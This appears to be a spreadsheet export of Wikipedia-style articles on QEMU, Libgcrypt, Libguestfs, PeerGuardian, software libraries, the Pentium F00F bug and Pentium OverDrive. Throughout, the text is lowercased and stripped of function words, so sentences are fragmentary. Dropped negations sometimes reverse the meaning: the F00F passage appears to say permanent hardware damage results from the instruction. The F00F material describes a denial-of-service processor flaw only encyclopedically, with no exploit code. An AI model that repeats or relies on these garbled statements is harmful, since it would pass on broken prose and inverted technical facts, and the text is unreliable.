.qed, .qcow, .cow) virtualbox virtual disk image (.vdi) virtual virtual hard disk (.vhd) virtual vfat vmware virtual machine disk (.vmdk) images (.img) contain sector-by-sector contents disk cd/dvd images (.iso) contain sector-by-sector contents optical disk (e.g. booting live oses) qemu object model qemu object model (qom) provides framework registering user creatable types instantiating objects types.qom provides following features: system dynamically registering types support single-inheritance types multiple inheritance stateless interfacessee also: object model hardware-assisted emulation mips-compatible loongson-3 processor adds instructions help qemu translate instructions; instructions lower overhead executing x86/cisc-style instructions mips pipeline. with additional improvements qemu chinese academy sciences, loongson-3 achieves average performance executing native binaries running binaries nine benchmarks. june 2020, source code published fork, claim cannot verified independently. parallel emulation virtualization solutions qemu able execute multiple virtual cpus parallel. user-mode emulation qemu maps emulated threads host threads. full system emulation, qemu capable running host thread emulated virtual (vcpu). this dependent guest updated support parallel system emulation, currently arm, alpha, hp-pa, powerpc, risc-v, s390x, xtensa. otherwise single thread used emulate virtual cpus (vcpus) executes vcpu round-robin manner. integration virtualbox virtualbox, first released january 2007, used qemu's virtual hardware devices, built-in dynamic recompiler based qemu. kqemu, virtualbox runs nearly guest code natively host (virtual machine manager) uses recompiler fallback mechanism example, guest code executes real mode. addition, virtualbox code analysis patching using built-in disassembler order minimize recompilation. virtualbox free open-source (available gpl), except certain features. xen-hvm xen, virtual machine monitor, (hardware virtual machine) mode, using intel vt-x amd-v hardware virtualization extensions cortex-a7 cortex-a15 virtualization extension. this means instead paravirtualized devices, real virtual hardware exposed domu real device drivers talk qemu includes several components: emulators, emulated devices, generic devices, machine descriptions, user interface, debugger. emulated devices generic devices qemu make device models virtualization. they comprise piix3 (with rudimentary piix4 capabilities), cirrus logic plain emulated video, rtl8139 e1000 network emulation, acpi support. apic support provided xen. xen-hvm device emulation based qemu project provide virtualization vms. hardware emulated qemu "device model" daemon running backend dom0. unlike qemu running modes (dynamic translation kvm), virtual cpus completely managed hypervisor, takes care stopping qemu emulating memory-mapped accesses. (kernel-based virtual machine) freebsd linux kernel module allows user space program access hardware virtualization features various processors, qemu able offer virtualization x86, powerpc, s/390 guests. when target architecture host architecture, qemu make particular features, acceleration. win4lin desktop early 2005, win4lin introduced win4lin desktop, based 'tuned' version qemu kqemu hosts nt-versions windows. june 2006, win4lin released win4lin virtual desktop server based code base. win4lin virtual desktop server serves microsoft windows sessions thin clients linux server. september 2006, win4lin announced change company name virtual bridges release win4bsd desktop, port product freebsd pc-bsd. solaris support followed 2007 release win4solaris desktop win4solaris virtual desktop server. serialice serialice qemu-based firmware debugging tool running system firmware inside qemu accessing real hardware serial connection host system. this used cheap replacement hardware in-circuit emulators (ice). winuae winuae introduced support cyberstorm blizzard 603e boards using qemu core version 3.0.0. unicorn unicorn emulation framework based qemu's "tcg" emulator. unlike qemu, unicorn focuses only: emulation peripherals provided binary code (outside context executable file system image) directly. unicorn thread-safe multiple bindings instrumentation interfaces. emulated hardware platforms besides (which also configurable emulate number intel models including march 2018) sandy bridge, bridge, haswell, broadwell skylake), following devices emulated: cd/dvd-rom drive using image floppy disk drive controller serial ahci controller graphics card: cirrus clgd 5446 vga-card, standard-vga graphics card bochs-vbe, network card: realtek 8139c+ pci, ne2000 pci, ne2000 isa, pcnet, e1000 (pci intel gigabit ethernet) e1000e (pcie intel gigabit ethernet) nvme disk interface serial port parallel port speaker i440fx/piix3 q35/ich9 chipsets ps/2 mouse keyboard scsi controller: megaraid 1078, lsi53c895a, ncr53c9x found pcscsi tekram dc-390 controllers sound card: sound blaster audiopci es1370 (ac97), gravis ultrasound, intel audio watchdog timer (intel 6300 pci, ib700 isa) 1.x/2.x/3.x controllers (uhci, ehci, xhci) devices: audio, bluetooth dongle, (keyboard/mouse/tablet), mtp, serial interface, smartcard reader, storage (bulk-only transfer attached scsi), wacom tablet paravirtualized virtio devices: block device, network card, scsi controller, video device, serial interface, balloon driver, 9pfs filesystem driver paravirtualized devices: block device, network card, console, framebuffer input devicethe bios implementation used qemu starting version 0.12 seabios. bios implementation comes plex86/bochs. uefi firmware qemu ovmf. powerpc powermac qemu emulates following powermac peripherals: uninorth bridge pci-vga-compatible graphics card maps vesa bochs extensions pmac-ide-interfaces hard disk cd-rom support. ne2000 adapter non-volatile via-cuda keyboard mouse.openbios used firmware. prep qemu emulates following prep peripherals: bridge vga-compatible graphics card vesa bochs extensions interfaces hard disk cd-rom support floppy disk drive ne2000 network adapter serial interface prep non-volatile pc-compatible keyboard mouseon prep target, open hack'ware, open-firmware-compatible bios, used. system qemu emulate paravirtual spapr interface following peripherals: bridge, access virtio devices, vga-compatible graphics, usb, etc. virtual network adapter, scsi controller, serial interface spapr non-volatile ramon spapr target, another open-firmware-compatible bios used, called slof. arm32 qemu emulates armv7 instruction (and armv5tej) neon extension. emulates full systems like integrator/cp board, versatile baseboard, realview emulation baseboard, xscale-based pdas, palm tungsten|e pda, nokia n800 nokia n810 internet tablets etc. qemu also powers android emulator part android (most current android implementations arm-based). starting version 2.0.0 bada sdk, samsung chosen qemu help development emulated 'wave' devices. 1.5.0 1.6.0 samsung exynos 4210 (dual-core cortex versatile express cortex-a9 cortex-a15 emulated. 1.6.0, 32-bit instructions armv8 (aarch64) architecture emulated, 64-bit instructions unsupported. xilinx cortex a9-based zynq modeled, following elements: zynq-7000 cortex-a9 zynq-7000 cortex-a9 mpcore triple timer counter memory controller controller (pl330) static memory controller (nand/nor flash) sd/sdio peripheral controller (sdhci) zynq gigabit ethernet controller controller (ehci host support only) zynq uart controller qspi controllers controller arm64 sparc qemu support 64-bit sparc architectures. when firmware javastation (sun4m-architecture) became version 0.8.1 proll, prom replacement used version 0.8.2, replaced openbios. sparc32 qemu emulates following sun4m/sun4c/sun4d peripherals: iommu io-units frame buffer (graphics card) lance (am7990) ethernet non-volatile m48t02/m48t08 slave i/o: timers, interrupt controllers, zilog serial ports, keyboard power/reset logic scsi controller hard disk cd-rom support floppy drive (not ss-600mp) cs4231 sound device (only ss-5, working yet) sparc64 emulating sun4u (ultrasparc pc-like machine), sun4v pc-like machine), generic niagara (t1) machine following peripherals: ultrasparc bridge vga-compatible card vesa bochs extensions ps/2 mouse keyboard non-volatile m48t59 pc-compatible serial ports interfaces hard disk cd-rom support floppy disk microblaze supported peripherals: microblaze with/without mmu, including timer interrupt controller peripherals external memory controller controller xilinx ethernet ethernet lite uart 16650 uartlite controller latticemico32 supported peripherals: from milkymist uart memory card ethernet timer cris openrisc others external trees exist, supporting following targets: zilog emulating sinclair spectrum pa-risc risc-v also qcow comparison platform virtualization software mtools ovpsim simh spim gxemul gnome boxes references external links official website systems emulation qemu developerworks article jones qvm86 project page debian emulated machine fedora port emulation qemu wikibook "qemu kvm" german, computer translated english) qemu windows qemu binaries windows microblaze emulation qemu qemu speed comparison unifiedsessionsmanager unofficial qemu/kvm configuration file definition couverture, code coverage project based qemu documentation pages https://github.com/qemu/qemu</t>
  </si>
  <si>
    <t>Libgcrypt</t>
  </si>
  <si>
    <t>libgcrypt cryptography library developed separated module gnupg. also used independently gnupg, depends error-reporting library libgpg-error.it provides functions fundamental cryptographic building blocks: libgcrypt features multiple precision arithmetic implementation, assembler implementations variety processors, including alpha, amd64, pa-risc, i386, i586, m68k, mips powerpc, sparc. also features entropy gathering utility, coming different versions unix-like windows machines. usually multiple, stable branches libgcrypt maintained parallel; since 2022-03-28 libgrypt 1.10 branch stable branch, plus branch ("long-term support") branch, maintained least 2024-12-31. also comparison cryptography libraries references</t>
  </si>
  <si>
    <t>Libguestfs</t>
  </si>
  <si>
    <t>libguestfs library tools accessing modifying virtual disk images used platform virtualization. tools used viewing editing virtual machines (vms) managed libvirt files inside vms, scripting changes vms, creating vms, much else besides. created security issues, virtual disk images mounted directly host system. libguestfs access nearly type file system including: known types linux filesystem (ext2/3/4, xfs, btrfs, etc.), windows filesystem (vfat ntfs), filesystems, lvm2 volume management, disk partitions, disks, qcow2, virtualbox vdi, vmware vmdk, hyper-v vhd/vhdx, files, local devices, isos, cards, remotely ftp, http, ssh, iscsi, nbd, glusterfs, ceph, sheepdog, much more. libguestfs require root permissions. functionality available shell called guestfish. there rescue shell called virt-rescue fixing unbootable virtual machines. multiple tools available modeled ordinary unix commands, virt-cat virt-tar.libguestfs also linked management programs bindings perl, python, ruby, java, ocaml, php, haskell, erlang, lua, golang used shell scripts command line. using fuse module guest filesystems mounted host guestmount command.libguestfs implemented using kernel-based virtual machine linux kernel. also kernel-based virtual machine (kvm) qemu libvirt openstack linux range use#virtualization references external links official website</t>
  </si>
  <si>
    <t>Libipq</t>
  </si>
  <si>
    <t>libipq development library iptables userspace packet queuing. libipq provides communicating ip_queue. libipq deprecated favour newer libnetfilter_queue linux kernel-2.6.14 onwards. widely used software applications libipq used widely deployed applications interface linux kernel-space iptables packet filter. snort snort intrusion detection system runs user-space uses libipq interface linux's iptables packet filter. external links iptables netfilter.org libipq subversion repository linux page quick intro libipq libipq network simulator example</t>
  </si>
  <si>
    <t>Libquantum</t>
  </si>
  <si>
    <t>libquantum library quantum mechanics simulator originally focused virtual quantum computers. licensed gpl. part spec 2006. latest version stated v1.1.1 (jan 2013) mailing list, website v0.9.1 2007.an author libquantum, hendrik weimer, published paper nature using rydberg atoms universal quantum simulation colleagues, using work. references external links libquantum homepage</t>
  </si>
  <si>
    <t>PeerGuardian</t>
  </si>
  <si>
    <t>peerguardian free open source program developed phoenix labs. capable blocking incoming outgoing connections based blacklists. block peers torrent download visibility peer connection using lists. system also capable blocking custom ranges, depending upon user preferences. windows version program discontinued favor applications (phoenix labs encourage current peerguardian users migrate peerblock based peerguardian history development peerguardian started late 2002, programmer leonard. first public version released 2003, time music industry started individual file sharing users change previous stance would target consumers copyright infringement lawsuits). version original peerguardian (1.0) programmed visual basic quickly became popular among users despite blocking common protocol known high usage connected networks. december 2003, downloaded million times. original version released free source code made available open source license. version blocking ports peerguardian.net shifted bluetack.co.uk protowall, blocklist manager, b.i.m.s hosts manager developed. version after months development, february 2005 version peerguardian released beta. development version cory nelson, aimed resolve many shortcomings version version enabled support protocols (tcp, udp, icmp, etc.), multiple block lists, automatic updates. installation procedure also simplified, longer requiring system restart driver installation. speed resource inefficiencies fixed re-designing re-coding version consume less processing power memory. desktop firewall software windows, version installed kernel-level filter windows 2000 later, giving application direct access windows networking stack improving performance. support windows vista ipv6 release candidate phase 2009. blacklist blacklist stored number different formats: binary formats binary formats (known p2b) created release first beta version peerguardian order create smallest possible blocklist. version this format used earliest releases peerguardian compressed using gzip format. lists longer produced format. version widely used format, supported among number applications, including emule linux version peerguardian. equivalent first version format, instead uses utf-8 store names. version newest version format, currently supported latest version windows version peerguardian this format uses compression additional size reduction. recent adoption format made least compatible one. plaintext format original format peerguardian version simple plaintext format. unfortunately meant lists became large cost bandwidth distribute, heralding construction smaller binary formats. format follows: rangename:firstip-lastip example: localhost:127.0.0.1-127.0.0.1 this format also used emule, safepeer vuze plugin, protowall, ktorrent, transmission. blacklist management issues since least 2006, blocklist used peerguardian provided "bluetack internet security solutions". ("bluetack" name member original peerguardian team owned previous domain peerguardian.net created "block list manager" used maintain list.) bluetack.co.uk developed application called bluetack internet management system (b.i.m.s) would spider whois servers create internet addresses. with database admins site (seraphielx, moore, firstaid, tozanno, deathangel, r00ted) would search names anti-p2p companies status code entry make blocklists would downloaded blocklist manager import peerguardian, protowall, applications would block anti-p2p traffic accessing download. they would also obtain logs people sent letters downloading "illegal" software, music videos figure list belong flag entry safe. peerguardian developers state control bluetack's list, promote link alternative lists. they criticized overly broad blocking based unsubstantiated evidence. peerguardian acknowledges battlefield blizzard, steam, arenanet connectivity blocked, creates problems many online gaming users aware peerguardian break game connectivity, thus directed read manual. with blocklist manager application, users sites "safe list" allowing continue using games websites without interference peerguardian. 2007, bluetack/peerguardian criticized blocking denis.stalker.h3q.com, second largest bittorrent tracker december 2007, "anti-p2p" address, claiming maintainers (whose tracking software "opentracker" also used pirate bay) conspiring mpaa mediadefender. maintainers members chaos computer club (ccc), long-standing association hackers freedom information activists, also briefly tracker ccc's network. bluetack also blocked itself, accusing "anti-p2p work" "threat" file sharers, others pointed fact publicly defending years, even called boycotting music industry protest file sharing lawsuits.although addresses government business entities easily added list addresses blocked, means peerguardian block access government business using undocumented address identify people engaged copyright infringement possibly unlawful activity. peerguardian lite peerguardian lite derivative peerguardian made consume little possible. options consists single tray icon. longer developed, latest version released april 2005. also open-source, allowing future derivatives party. developers reported online, peerguardian lite continued project program peerblock, peerguardian lite users recommended around 2008 switch peerblock. peerblock options, uses almost little peerguardian lite did. other criticism besides original criticism version slow buggy, criticism peerguardian around actual technique used block peers. critics pointed blocklists open public, thus parties wish circumvent peerguardian actively check list addresses blocked. blocklists also managed public, fool-proof method checking reporting address range bad, checking blocked addresses still remain bad. list relies public make submissions, thus vulnerable attack (see section blocklist management issues). vista windows listed application compatibility, require work around involving disabling driver signing require degree computer skill. references external links official site peerguardian sourceforge peerblock peerblocklist infringement effectiveness p2partisan peerguardian style script running routers tomato firmware</t>
  </si>
  <si>
    <t>Library (computer science)</t>
  </si>
  <si>
    <t>computer science, library collection non-volatile resources used computer programs, often software development. these include configuration data, documentation, help data, message templates, pre-written code subroutines, classes, values type specifications. ibm's os/360 successors referred partitioned data sets.a library also collection implementations behavior, written terms language, well-defined interface behavior invoked. instance, people want write higher-level program library make system calls instead implementing system calls again. addition, behavior provided reuse multiple independent programs. program invokes library-provided behavior mechanism language. example, simple imperative language behavior library invoked using normal function-call. what distinguishes call library function, versus another function program, code organized system.library code organized used multiple programs connection other, code part program organized used within program. this distinction gain hierarchical notion program grows large, multi-million-line program. case, internal libraries reused independent sub-portions large program. distinguishing feature library organized purposes reused independent programs sub-programs, user needs know interface internal details library. value library lies reuse standardized program elements. when program invokes library, gains behavior implemented inside library without implement behavior itself. libraries encourage sharing code modular fashion ease distribution code. behavior implemented library connected invoking program different program lifecycle phases. code library accessed build invoking program, library called static library. alternative build executable invoking program distribute that, independently library implementation. library behavior connected executable invoked executed, either part process starting execution, middle execution. case library called dynamic library (loaded runtime). dynamic library loaded linked preparing program execution, linker. alternatively, middle execution, application explicitly request module loaded. most compiled languages standard library, although programmers also create custom libraries. most modern software systems provide libraries implement majority system services. such libraries organized services modern application requires. such, code used modern applications provided system libraries. history 1947 goldstine neumann speculated would useful create "library" subroutines work machine, early computer operational time. they envisioned physical library magnetic wire recordings, wire storing reusable computer code.inspired neumann, wilkes team constructed edsac. filing cabinet punched tape held subroutine library computer. programs edsac consisted main program sequence subroutines copied subroutine library. 1951 team published first textbook programming, preparation programs electronic digital computer, detailed creation purpose library.cobol included "primitive capabilities library system" 1959, jean sammet described "inadequate library facilities" retrospect.jovial communication pool (compool), roughly library header files. another major contributor modern library concept came form subprogram innovation fortran. fortran subprograms compiled independently other, compiler lacked linker. prior introduction modules fortran-90, type checking fortran subprograms impossible.by 1960s, copy macro libraries assemblers common. starting popularity system/360, libraries containing types text elements, e.g., system parameters, also became common. simula first object-oriented programming language, classes nearly identical modern concept used java, c++, class concept simula also progenitor package module modula-2. even developed originally 1965, simula classes could included library files added compile time. linking libraries important program linking binding process, resolves references known links symbols library modules. linking process usually automatically done linker binder program searches libraries modules given order. usually considered error link target found multiple times given libraries. linking done executable file created, whenever program used runtime. references resolved addresses jumps routine calls. they main program, module depending upon another. they resolved fixed relocatable addresses (from common base) allocating runtime memory memory segments module referenced. some programming languages feature called smart linking whereby linker aware integrated compiler, linker knows external references used, code library never actually used, even though internally referenced, discarded compiled application. example, program uses integers arithmetic, arithmetic operations all, exclude floating-point library routines. this smart-linking feature lead smaller application file sizes reduced memory usage. relocation some references program library module stored relative symbolic form cannot resolved code libraries assigned final static addresses. relocation process adjusting references, done either linker loader. general, relocation cannot done individual libraries addresses memory vary depending program using libraries combined with. position-independent code avoids references absolute addresses therefore require relocation. static libraries when linking performed creation executable another object file, known static linking early binding. case, linking usually done linker, also done compiler. static library, also known archive, intended statically linked. originally, static libraries existed. static linking must performed modules recompiled. modules required program sometimes statically linked copied executable file. this process, resulting stand-alone file, known static build program. static build need relocation virtual memory used address space layout randomization desired. shared libraries shared library shared object file intended shared executable files shared object files. modules used program loaded individual shared objects memory load time runtime, rather copied linker creates single monolithic executable file program. shared libraries statically linked compile-time, meaning references library modules resolved modules allocated memory executable file created. often linking shared libraries postponed loaded.most modern operating systems shared library files format executable files. this offers main advantages: first, requires making loader them, rather (having single loader considered well worth added complexity). secondly, allows executables also used shared libraries, symbol table. typical combined executable shared library formats mach-o (both unix) (windows). older environments 16-bit windows 3000, stack-based data (local) allowed shared-library code, significant restrictions placed shared-library code. memory sharing library code shared memory multiple processes, disk. virtual memory used, processes would execute physical page mapped different address spaces processes. this advantages. instance, openstep system, applications often hundred kilobytes size loaded quickly; code located libraries already loaded purposes operating system.programs accomplish sharing using position-independent code, unix, leads complex flexible architecture, using common virtual addresses, windows os/2. these systems ensure, various means, like pre-mapping address space reserving slots shared library, code high probability shared. third alternative single-level store, used system/38 successors. this allows position-dependent code, places significant restrictions code placed shared. cases, different versions shared libraries cause problems, especially libraries different versions file name, different applications installed system require specific version. such scenario known hell, named windows os/2 file. most modern operating systems 2001 clean-up methods eliminate situations application-specific "private" libraries. dynamic linking dynamic linking late binding linking performed program loaded (load time) executed (runtime), rather executable file created. dynamically linked library (dynamic-link library, dll, windows os/2; shareable image openvms; dynamic shared object, dso, unix-like systems) library intended dynamic linking. only minimal amount work done linker executable file created; records library routines program needs index names numbers routines library. majority work linking done time application loaded (load time) execution (runtime). usually, necessary linking program, called "dynamic linker" "linking loader", actually part underlying operating system. (however, possible, exceedingly difficult, write program uses dynamic linking includes dynamic linker, even operating system provides support dynamic linking.) programmers originally developed dynamic linking multics operating system, starting 1964, (michigan terminal system), built late 1960s. optimizations since shared libraries systems change often, systems compute likely load address shared library system needed store information libraries executables. every shared library loaded undergone process, load predetermined address, speeds process dynamic linking. this optimization known prebinding prelinking macos linux, respectively. z/vm uses similar technique, called "discontinuous saved segments" (dcss). disadvantages technique include time required precompute addresses every time shared libraries change, inability address space layout randomization, requirement sufficient virtual address space problem alleviated adoption 64-bit architectures, least time being). locating libraries runtime loaders shared libraries vary widely functionality. some depend executable storing explicit paths libraries. change library naming layout file system cause systems fail. more commonly, name library (and path) stored executable, operating system supplying method find library disk, based algorithm. shared library executable depends deleted, moved, renamed, incompatible version library copied place earlier search, executable would fail load. this called dependency hell, existing many platforms. (infamous) windows variant commonly known hell. this problem cannot occur version library uniquely identified program references libraries full unique identifiers. "dll hell" problems earlier windows versions arose using names libraries, guaranteed unique, resolve dynamic links programs. avoid "dll hell", later versions windows rely largely options programs install private dlls—essentially partial retreat shared libraries—along mechanisms prevent replacement shared system dlls earlier versions them.) microsoft windows microsoft windows checks registry determine proper place load dlls implement objects, dlls check directories defined order. first, windows checks directory loaded program (private dll); directories calling setdlldirectory() function; system32, system, windows directories; current working directory; finally directories specified path environment variable. applications written .net framework (since 2002), also check global assembly cache primary store shared files remove issue hell. openstep openstep used flexible system, collecting list libraries number known locations (similar path concept) system first starts. moving libraries around causes problems all, although users incur time cost first starting system. unix-like systems most unix-like systems "search path" specifying file-system directories look dynamic libraries. some systems specify default path configuration file, others hard-code dynamic loader. some executable file formats specify additional directories search libraries particular program. this usually overridden environment variable, although disabled setuid setgid programs, user can't force program arbitrary code root permissions. developers libraries encouraged place dynamic libraries places default search path. downside, make installation libraries problematic, "known" locations quickly become home increasing number library files, making management complex. dynamic loading dynamic loading, subset dynamic linking, involves dynamically linked library loading unloading runtime request. such request made implicitly explicitly. implicit requests made compiler static linker adds library references include file paths simply file names. explicit requests made applications make direct calls operating system's api. most operating systems support dynamically linked libraries also support dynamically loading libraries run-time linker api. instance, microsoft windows uses functions loadlibrary, loadlibraryex, freelibrary getprocaddress microsoft dynamic link libraries; posix-based systems, including unix unix-like systems, dlopen, dlclose dlsym. some development systems automate process. object libraries although originally pioneered 1960s, dynamic linking reach operating systems used consumers late 1980s. generally available form operating systems early 1990s. during period, object-oriented programming (oop) becoming significant part programming landscape. runtime binding requires additional information traditional libraries supply. addition names entry points code located within, also require list objects depend this side-effect oop's core concepts, inheritance, means parts complete definition method different places. this simply listing library requires services another: true system, libraries known compile time, vary system system. time many developers worked idea multi-tier programs, "display" running desktop computer would services mainframe minicomputer data storage processing. instance, program gui-based computer would send messages minicomputer return small samples huge dataset display. remote procedure calls (rpc) already handled tasks, standard system. soon majority minicomputer mainframe vendors instigated projects combine two, producing library format could used anywhere. such systems known object libraries, distributed objects, supported remote access (not did). microsoft's example system local use. dcom, modified version com, supports remote access. time object libraries held status "next thing" programming world. there number efforts create systems would across platforms, companies competed developers locked system. examples include ibm's system object model (som/dsom), microsystems' distributed objects everywhere (doe), next's portable distributed objects (pdo), digital's objectbroker, microsoft's component object model (com/dcom), number corba-based systems. class libraries class libraries rough equivalent older types code libraries. they contain classes, describe characteristics define actions (methods) involve objects. class libraries used create instances, objects characteristics specific values. languages, like java, distinction clear, classes often contained library files (like java's file format) instantiated objects residing memory (although potentially able made persistent separate files). others, like smalltalk, class libraries merely starting point system image includes entire state environment, classes instantiated objects. today class libraries stored package repository (such maven central java). client code explicitly declare dependencies external libraries build configuration files (such maven java). remote libraries another library technique uses completely separate executables (often lightweight form) calls using remote procedure call (rpc) network another computer. this maximizes operating system re-use: code needed support library code used provide application support security every program. additionally, systems require library exist machine, forward requests network. however, approach means every library call requires considerable amount overhead. calls much expensive calling shared library already loaded machine. this approach commonly used distributed architecture makes heavy remote calls, notably client-server systems application servers enterprise javabeans. code generation libraries code generation libraries high-level apis generate transform byte code java. they used aspect-oriented programming, data access frameworks, testing generate dynamic proxy objects. they also used intercept field access. file naming most modern unix-like systems system stores libfoo.a libfoo.so files directories /lib, /usr/lib /usr/local/lib. filenames always start lib, suffix (archive, static library) (shared object, dynamically linked library). some systems might multiple names dynamically linked library. these names typically share prefix different suffixes indicating version number. most names names symbolic links latest version. example, systems libfoo.so.2 would filename second major interface revision dynamically linked library libfoo. files sometimes found library directories libtool archives, usable system such. macos system inherits static library conventions bsd, library stored file, .so-style dynamically linked libraries (with .dylib suffix instead). most libraries macos, however, consist "frameworks", placed inside special directories called "bundles" wrap library's required files metadata. example, framework called myframework would implemented bundle called myframework.framework, myframework.framework/myframework either dynamically linked library file symlink dynamically linked library file myframework.framework/versions/current/myframework. microsoft windows dynamic-link libraries usually suffix *.dll, although file name extensions identify specific-purpose dynamically linked libraries, e.g. *.ocx libraries. interface revisions either encoded file names, abstracted away using com-object interfaces. depending compiled, *.lib files either static libraries representations dynamically linkable libraries needed compilation, known "import libraries". unlike unix world, uses different file extensions, linking .lib file windows must first know regular static library import library. latter case, .dll file must present runtime. also code reuse linker (computing) computer program combines multiple object files single file loader (computing) part operating system dynamic-link library microsoft's implementation shared library concept windows os/2 object file file containing relocatable format machine code plug-in software component adds specific feature existing software application prelink, also known prebinding static library runtime library visual component library visual library (vcl) component library cross platform (clx) standard library standard library programming language java class library framework class library standard library microsoft's .net framework generic programming style computer programming (used standard library) soname field data shared object file method stub notes references further reading levine, john (2000) [october 1999]. "chapter shared libraries chapter dynamic linking loading". linkers loaders. morgan kaufmann series software engineering programming ed.). francisco, usa: morgan kaufmann. isbn 1-55860-496-0. oclc 42413382. archived original 2012-12-05. retrieved 2020-01-12. code: [1][2] errata: article beginner's guide linkers david drysdale article faster program startups improving runtime linking efficiency léon bottou john ryland create program libraries baris simsek binary file descriptor library library-centric software design workshop lcsd'05 archived 2019-08-28 wayback machine oopsla'05 library-centric software design workshop lcsd'06 oopsla'06 create shared library ulrich drepper (with much background info) anatomy linux dynamic libraries ibm.com</t>
  </si>
  <si>
    <t>Library (computing)</t>
  </si>
  <si>
    <t>Pentium F00F bug</t>
  </si>
  <si>
    <t>pentium f00f design flaw majority intel pentium, pentium mmx, pentium overdrive processors (all microarchitecture). discovered 1997, result processor ceasing function computer physically rebooted. circumvented operating system updates. name shorthand hexadecimal encoding offending instruction. more formally, called invalid operand locked cmpxchg8b instruction bug. description architecture, byte sequence represents instruction lock cmpxchg8b (locked compare exchange bytes register eax). also applies opcodes ending specify register operands eax. instruction require special privileges. this instruction encoding invalid. cmpxchg8b instruction compares value registers 8-byte value memory location. case, however, register specified instead memory location, allowed. under normal circumstances, would simply result exception; however, used lock prefix (normally used prevent processors interfering memory location), erroneously uses locked cycles read illegal instruction exception-handler descriptor. locked reads must paired locked writes, cpu's interface enforces forbidding memory accesses corresponding writes occur. none forthcoming, performing cycles activity stops, must reset recover. proliferation intel microprocessors, existence open-privilege instruction considered serious issue time. operating system vendors responded implementing workarounds detected condition prevented crash. information first appeared internet around november 1997. since f00f become common knowledge, term sometimes used describe similar hardware design flaws cyrix coma bug. permanent hardware damage results executing f00f instruction vulnerable system; simply locks rebooted. however, data loss unsaved data likely disk buffers flushed, drives interrupted write operation, non-atomic operation interrupted. myb2 stepping solved issue intel's pentium processors.the f00f instruction considered example halt catch fire (hcf) instruction. workarounds although definite solution problem required sort hardware/firmware revision, proposed workarounds time prevented exploitation issue generating denial-of-service attack affected machine. based forcefully breaking pattern faulty accesses responsible processor hang. intel's proposed (therefore "official") solutions required setting table interrupt descriptors unnatural forced processor issue intervening page fault could access memory containing descriptor undefined-opcode exception. these extraneous memory accesses turned sufficient interface locking requirement root cause bug. specifically, table interrupt descriptors, normally resides single memory page, instead split pages descriptors first seven exception handlers reside page, remainder table following page. handler undefined opcode exception last descriptor first page, handler page-fault exception resides second page. first page made not-present (usually signifying page swapped disk make room data), force processor fetch descriptor page-fault exception handler. this descriptor, residing second page table, present memory usual not, processor would double- triple-fault, leading shutdown). these extra memory cycles override memory locking requirement issued original illegal instruction (since faulting instructions supposed able restarted exception handler returns). handler page-fault exception modified, however, cope necessity providing missing page first half interrupt descriptor table, task usually required perform. second official workaround intel proposed keeping pages present memory, marking first page read-only. since originating illegal instruction supposed issue memory write cycle, enough forcing intervention page-fault handler. this variant advantage modifications required page-fault handler minor compared ones required first variant; basically needs redirect undefined-exception handler appropriate. however, variant requires operating system prevented writing read-only pages (through setting global processor flag), kernels designed way; recent kernels fact are, since basic mechanism used implementing copy-on-write. additional workarounds official ones intel proposed; many cases proved effective much easier implement. simplest involved merely marking page containing interrupt descriptors non-cacheable. again, extra memory cycles processor forced fetch data every time needed invoke exception handler appeared needed prevent processor locking case, modification whatsoever exception handler required. and, although strictly necessary, split interrupt descriptor table performed case, first page marked non-cacheable. this performance reasons, page containing descriptors (and ones often required, fact) could stay cache. unknown reasons, additional, unofficial workarounds never endorsed intel. might suspected might work affected processor versions. also cmpxchg8b denial-of-service attack pentium fdiv meltdown (security vulnerability) spectre (security vulnerability) references further reading crothers, brooke (1997-11-10). "net reacts "f0" pentium bug". cnet news. retrieved 2015-07-27. collins, robert (1998-05-01). "the pentium f00f bug". dobb's journal. retrieved 2015-07-27. world. world communications. 1998 https://books.google.com/books?id=cezvaaaamaaj. retrieved 2015-07-27. {{cite journal}}: missing empty |title= (help) external links intel pentium erratum microsoft knowledge base article f00f entry</t>
  </si>
  <si>
    <t>Pentium OverDrive</t>
  </si>
  <si>
    <t>pentium overdrive microprocessor marketing brand name used intel, cover variety consumer upgrade products sold mid-1990s. originally released motherboards, later pentium sockets. intel dropped brand, failed appeal corporate buyers, discouraged system sales. sockets pentium overdrive heavily modified, volt pentium core manufactured micrometer technology. fitted 486-compatible unit (though increased pin-count), integrated heatsink fan, level cache, double offered regular p54c chips. data effectively reduced 32-bit width, per-clock performance much lower 'regular' pentium, though still substantially faster compared similarly-clocked owing pentium's architectural improvements, much improved fpu. also equipped integrated volt power regulator many motherboards provided volt power. model launched february 1995, supported systems. much faster version, supported effective) systems, launched much later year september, expensive $299 compared upgrade alternatives, based amd's 5x86 cyrix's cx5x86 chips.the processor's heatsink permanently attached, removable module powered spring-like metal prongs connect trio conductors surface chip. clip releases visible first photo, left corner cpu. central plastic "column" leads center houses wiring leads side heatsink corner. small plastic points left column locking mechanism released squeezing them. opposite corner latch locks around underneath heatsink, swinging place upon assembly. processor monitors throttle back clock speed prevent overheating damage operating. this predecessor internal temperature detection protection intel's modern processors. compatibility performance during development, intel changed design specification, causing various compatibility performance problems boards previously fully compatible. instance, packard bell motherboard required specially-designed interposer installed processor motherboard cope changed specification, unfortunate consequence precluding access motherboard's level cache, resulting sub-par performance. addition, older chipsets support write-back functionality chip's level cache, could also reduce performance. however, majority socket motherboards, particularly later (post-1994) boards, provide proper support pentium overdrive including fully operational access level cache, many earlier boards also support processor varying levels compatibility performance. performance-wise, many popular synthetic benchmarks time showed pentium overdrive under-performing much cheaper higher-clocked rivals, though real-world performance (given motherboard cache optimally used) could much different: programs floating-point dependent optimized pentium architecture becoming increasingly common late nineties) derived substantial benefit pentium overdrive, particularly version. addition, fully supported programs operating systems specifically coded pentium architecture, many emulators, multimedia utilities even later windows operating systems games; however, benefit running programs clock- motherboard bus-constrained system questionable. models podp5v63 introduced february 1995 pins, p24t pinout volts cache front side 2.5)podp5v83 introduced september 1995 pins, p24t pinout volts cache front side 2.5)some models (part number 109x4405h6j05) pins instead 235. some cpus came chopped (pin others completely missing covered encapsulation. pentium sockets original socket pentium chips higher voltages (5v) later models. although little known, intel fact release overdrive chip sockets, used internal clock multiplier change "120/133" machine. podp5v120: podp5v133: busthe overdrive processors pentium also released (socket running 125, (clock multiplier 2.5). oddity, intel never made pentium stand-alone processor. podp3v125: podp3v150: podp3v166: busthese replaced pentium overdrive mmx, also upgraded pentium faster version technology. podpmt66x200: (clock multiplier 3.0) podpmt66x166: (clock multiplier 2.5) podpmt60x180: (clock multiplier 3.0) podpmt60x150: (clock multiplier 2.5) socket 1998 pentium overdrive, part number podp66x333, released upgrade path pentium owners. this upgrade could used single dual processor socket systems, sockets quad processor socket systems removed. although could quad hexa socket systems unofficially users upgraded them.combining 